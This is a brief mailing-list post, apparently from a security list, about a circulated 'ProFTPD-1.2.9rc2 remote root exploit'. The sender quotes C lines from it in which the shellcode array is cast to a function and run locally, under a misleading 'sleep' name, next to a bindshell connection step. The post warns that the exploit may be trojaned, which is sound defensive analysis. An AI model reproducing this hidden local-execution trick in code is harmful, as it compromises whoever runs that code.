From: lionel.garcia at airbus.com (GARCIA Lionel)
Subject: ProFTPD-1.2.9rc2 remote root exploit

This line seems suspicious. Don't know the purpose of the shellcode, but I
won't try it.

   /* connect to the bindshell */
   printf("Trying to connect, please wait...\n");

--->   void(*sleep)()=(void*)sc;sleep(5);   <------- Hummm :-\
   if(give_me_a_shell(addr) < 0)

     {
      fprintf(stderr, "Sorry, exploit didn't work.\n");
      return(-1);

The shellcode seems to be locally launched. Anybody to "decrypt" the
shellcode ?